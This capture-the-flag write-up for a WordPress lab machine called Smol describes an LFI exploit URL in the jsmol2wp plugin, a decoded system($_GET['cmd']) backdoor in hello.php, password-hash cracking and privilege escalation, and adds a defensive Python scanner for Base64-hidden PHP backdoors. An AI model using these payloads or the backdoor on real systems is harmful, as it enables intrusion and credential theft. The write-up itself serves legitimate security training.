At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.
Quick tip: Did you know that on computers without a GPU, like the AttackBox, John the Ripper is faster than Hashcat?
Note: Please allow 4 minutes for the VM to fully boot up.
Flag 1
What is the user flag?
We first add <MACHINE IP> www.smol.thm to /etc/hosts so that the hostname resolves.
Run wpscan --url http://www.smol.thm --plugins-detection passive -e ap.
We see that the enumerated plugin is jsmol2wp, last updated in 2018. That is already a bad sign.
With further searches on Google, we see that it is vulnerable to local file inclusion (LFI).
Credit: https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
We can then exploit using the URL http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
The wp-config.php output contains the database credentials, and we can use them to log in to WordPress.
Looking at Profile -> Pages -> Webmaster Tasks!!, we see that the author uses the Hello Dolly plugin.
Looking it up on GitHub, we see that the plugin lives in the hello.php file.
We can read that file through the same LFI, using http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php.
Within the PHP file, we see a Base64-encoded string. Decoded to ASCII, the code looks like this:
if (isset($_GET["cmd"])) {
    system($_GET["cmd"]);
}
As we can see, this is a backdoor that gives remote code execution: whatever is passed in the cmd GET parameter is run through system().
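As an added defender-side example (not from the room or this write-up), the Python script below scans plugin PHP files for long Base64 runs and flags any that decode to command-execution calls or superglobal reads, which is exactly how the payload hid inside hello.php. The sample plugin sources, file layout and the PAYLOAD/DANGEROUS names are constructed here and are not the real plugin files.

```python
import base64
import re
from pathlib import Path

# Once a base64 blob is decoded, these indicate command execution or
# user-controlled input feeding it (the Smol backdoor matches both).
DANGEROUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
    r"|\$_(GET|POST|REQUEST|COOKIE)\b"
)
# Long base64-looking runs; legitimate plugin code rarely contains them.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

def decode_b64_blobs(text):
    """Yield (blob, decoded_text) for every run that is valid base64."""
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # includes binascii.Error: bad padding/alphabet
            continue
        yield blob, raw.decode("utf-8", errors="replace")

def scan_php_source(text):
    """Return [(blob_prefix, decoded)] for blobs whose decoded form is suspicious.
    Only one base64 layer is unwrapped; gzinflate/rot13/hex wrappers need more."""
    return [(blob[:16] + "...", decoded.strip())
            for blob, decoded in decode_b64_blobs(text)
            if DANGEROUS.search(decoded)]

def scan_plugin_dir(root):
    """Scan every .php file under root; map path -> findings (only non-empty)."""
    results = {}
    for path in Path(root).rglob("*.php"):
        findings = scan_php_source(path.read_text(errors="replace"))
        if findings:
            results[str(path)] = findings
    return results

# Constructed samples (not the real plugin files). The backdoored one wraps
# the exact payload decoded from hello.php above in eval(base64_decode()).
PAYLOAD = base64.b64encode(
    b'if (isset($_GET["cmd"])) {\n    system($_GET["cmd"]);\n}').decode()
SAMPLE_BACKDOORED = ('<?php\nfunction hello_dolly() {\n'
                     f'    eval(base64_decode("{PAYLOAD}"));\n}}\n')
LYRIC = base64.b64encode(b"Hello, Dolly. Well, hello, Dolly. It's so nice to have you back.").decode()
SAMPLE_CLEAN = f'<?php\n$lyrics = base64_decode("{LYRIC}");\necho $lyrics;\n'

if __name__ == "__main__":
    for name, src in (("backdoored", SAMPLE_BACKDOORED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_php_source(src))
```

Run it against a real wp-content/plugins directory with scan_plugin_dir to get a per-file list of suspicious blobs to review by hand.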
As we navigate to the Dashboard, we see a message mentioning Dolly, indicating that the Hello Dolly plugin is active.
We can test the RCE here by supplying the cmd parameter, and sure enough, we get output back.
I then set up a listener on my machine and used the RCE to get a reverse shell.
We can then run ps auxww to check for any interesting running processes. We see that MySQL is running, as shown in the output.
We can then run mysql -u wpuser -p and enter the same password as before, which gives us access to the database.
I played around with the database a little bit and eventually found that these commands lead us to the credentials:
use wordpress;
select * from wp_users;
We then save the hashes into a file (in my case hashes.txt) and crack them with John the Ripper by running john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt.
We cracked our first one.
We then log in as diego using that password and navigate to /home/diego to get the flag.
Flag 2
What is the root flag?
As we check out the think user's home directory, we see that we can read the SSH key.
We can log in as think by running ssh think@www.smol.thm -i id_rsa.
After logging in as think, we can su gege to switch to gege, who has a password-protected ZIP file for us to investigate.
We then copy the ZIP file to our attacker machine to crack it.
We then run fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt wordpress.old.zip.
We can then use the cracked password to unzip the file. Inside, one file catches our eye.
Upon reading that file, we see the credentials for xavi. And now we are xavi.
Running sudo -l, we see that we can run sudo with everything, meaning we are essentially root once we run a command such as sudo su.
We then navigate to /root to get the flag.